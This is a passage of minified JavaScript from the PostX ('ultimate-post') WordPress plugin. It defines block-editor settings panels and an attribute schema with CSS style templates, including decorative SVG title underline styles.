0.5",right:"0.5",bottom:"0.5",left:"0.5",unit:"px"},type:"solid",color:"#969696",openBorder:0},contentWrapInnerPadding:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"},xs:{top:"",bottom:"",left:"",right:"",unit:"px"}}},layout5:{imgWidth:{lg:"50",ulg:"%"},catSacing:{lg:{top:"0",bottom:"10",unit:"px"},xs:{top:"0",bottom:"5",unit:"px"}},contentWrapBorder:{width:{top:"0.5",right:"0.5",bottom:"0.5",left:"0.5",unit:"px"},type:"solid",color:"#969696",openBorder:1},contentWrapInnerPadding:{lg:{top:"40",bottom:"40",left:"30",right:"30",unit:"px"},xs:{top:"21",bottom:"21",left:"21",right:"21",unit:"px"}}}}}},{position:3,data:{type:"range",key:"rowSpace",min:0,max:80,step:1,responsive:!0,label:__("Row Gap","ultimate-post")}},{position:6,data:{type:"toggle",key:"imgFlip",label:__("Image Flip","ultimate-post")}},{position:7,data:{type:"toggle",key:"mobileImageTop",label:__("Stack on Mobile","ultimate-post")}},{position:8,data:{type:"tag",key:"varticalAlign",label:__("Vertical Align","ultimate-post"),options:[{value:"top",label:__("Top","ultimate-post")},{value:"middle",label:__("Middle","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:b.title,exclude:["titleBackground"]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:b.image,include:[{position:3,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin","imgCropSmall"],hrIdx:[{tab:"settings",hr:[2,10]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,depend:"metaShow",initialOpen:b.meta,exclude:["metaListSmall"],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:b["taxonomy-/-category"],depend:"catShow",store:t,hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:b.excerpt,store:t,hrIdx:[3,6]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:b["read-more"],depend:"readMore"}),(0,o.createElement)(a.rS,{initialOpen:b.video,depend:"vidIconEnable",store:t}),(0,o.createElement)(a.Yp,{depend:"separatorShow",exclude:["septSpace"],store:t}),(0,o.createElement)(a.O2,{store:t,exclude:["contenWraptWidth","contenWraptHeight"]}),"layout2"===l&&(0,o.createElement)(a.wT,{store:t}),!d&&(0,o.createElement)(i.Z,{open:b.filter||b.pagination||b.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:b.heading,depend:"headingShow"}),"posts"!=n&&"customPosts"!=n&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:b.filter,depend:"filterShow",hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,initialOpen:b.pagination,depend:"paginationShow",store:t}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:s,titleShow:p,catPosition:c,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,p&&0==m,i&&"top"==b,p&&1==m,f&&"aboveTitle"==c,h&&s];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo"],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exSettings:["metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],incStyle:[{position:0,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}}],exSettings:["imgCropSmall"],exStyle:["imgMargin"]}));default:return null}}},18490:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},columns:{type:"object",default:{lg:"1"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-template-columns: repeat({{columns}}, 1fr); }"}]},columnGridGap:{type:"object",default:{lg:"30",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-column-gap: {{columnGridGap}}; }"}]},rowSpace:{type:"object",default:{lg:"30"},style:[{depends:[{key:"separatorShow",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-block-row {row-gap: {{rowSpace}}px; }"},{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { padding-bottom: {{rowSpace}}px; margin-bottom:{{rowSpace}}px; }"}]},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!0},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\");  }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"24",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"30",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title, \n          {{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:0,bottom:0,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},varticalAlign:{type:"string",default:"middle",style:[{depends:[{key:"varticalAlign",condition:"==",value:"top"}],selector:"{{ULTP}} .ultp-block-content-top .ultp-block-content { -ms-flex-item-align: flex-start;-ms-grid-row-align: flex-start;align-self: flex-start; }"},{depends:[{key:"varticalAlign",condition:"==",value:"middle"}],selector:"{{ULTP}} .ultp-block-content-middle .ultp-block-content { -ms-flex-item-align: center;-ms-grid-row-align: center;align-self: center; }"},{depends:[{key:"varticalAlign",condition:"==",value:"bottom"}],selector:"{{ULTP}} .ultp-block-content-bottom .ultp-block-content { -ms-flex-item-align: flex-end;-ms-grid-row-align: flex-end;align-self: flex-end; }"}]},imgFlip:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout3"]}],selector:"{{ULTP}} .ultp-block-content-true .ultp-block-media, \n          {{ULTP}} .ultp-block-content-1 .ultp-block-media { flex-direction: row-reverse; }"}]},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",depends:[{key:"showImage",condition:"==",value:!0}]},imgWidth:{type:"object",default:{lg:"50",ulg:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { max-width: {{imgWidth}}; height:fit-content; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { height:fit-content; }\n          {{ULTP}} .ultp-block-item .ultp-block-video-content iframe, \n          {{ULTP}} .ultp-block-item .ultp-block-video-content video,\n          {{ULTP}} .ultp-block-item .ultp-block-image img { height: {{imgHeight}}; }"}]},imageScale:{type:"string",default:"cover",style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img {object-fit: {{imageScale}};}"}]},imgAnimation:{type:"string",default:"opacity"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap { overflow:visible } \n          {{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-wrap { overflow:visible } \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},imgSpacing:{type:"object",default:{lg:"40"},style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!1},{key:"layout",condition:"==",value:"layout4"}],selector:"{{ULTP}} .ultp-block-image { margin-right: {{imgSpacing}}px; margin-left: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-block-image { margin-right: 0; margin-left: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!1},{key:"layout",condition:"==",value:"layout5"}],selector:"{{ULTP}} .ultp-block-image { margin-right: {{imgSpacing}}px; margin-left: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-block-image { margin-right: 0; margin-left: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!1},{key:"layout",condition:"!=",value:"layout4"}],selector:"{{ULTP}} .ultp-block-image { margin-right: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-block-image { margin-right: 0; margin-left: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { margin-left: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-block-image { margin-left: 0; margin-right: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-layout4 .ultp-block-item:nth-child(even) .ultp-block-content-wrap .ultp-block-image { margin-left:20px; }"}]},mobileImageTop:{type:"boolean",default:!0,style:[{selector:"@media (max-width: 768px) {\n            {{ULTP}} .ultp-block-item .ultp-block-image {margin-right:0; margin-left:0; max-width: 100%;} \n          {{ULTP}} .ultp-block-media .ultp-block-content-wrap { display: block;} \n          {{ULTP}} .ultp-block-media .ultp-block-content-wrap .ultp-block-content { margin: auto 0px !important; padding: 0px } }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:40,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:21,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:0,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt{ padding: {{excerptPadding}}; }"}]},separatorShow:{type:"boolean",default:!0},septColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:last-of-type) { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"dashed",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:last-of-type) { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:last-of-type) { border-bottom-width: {{septSize}}px; }"}]},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: center;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; } \n          .rtl  {{ULTP}} .ultp-block-meta { justify-content: start; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:" .rtl {{ULTP}} .ultp-block-readmore a {display:flex; flex-direction:row-reverse;justify-content: flex-end;}"}]},contentWrapBg:{type:"string",default:"var(--postx_preset_Base_1_color)",style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap { background:{{contentWrapBg}}; }"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content { background:{{contentWrapBg}} !important; }"}]},contentWrapHoverBg:{type:"string",style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap:hover { background:{{contentWrapHoverBg}}; }"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap:hover .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content-wrap:hover .ultp-block-content { background:{{contentWrapHoverBg}} !important; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_1_color)",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap:hover"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap:hover .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content-wrap:hover .ultp-block-content"}]},contentWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap { border-radius: {{contentWrapRadius}}; }"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap:hover { border-radius: {{contentWrapHoverRadius}}; }"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap:hover .ultp-block-content, \n          {{ULTP}} .ultp-layout5 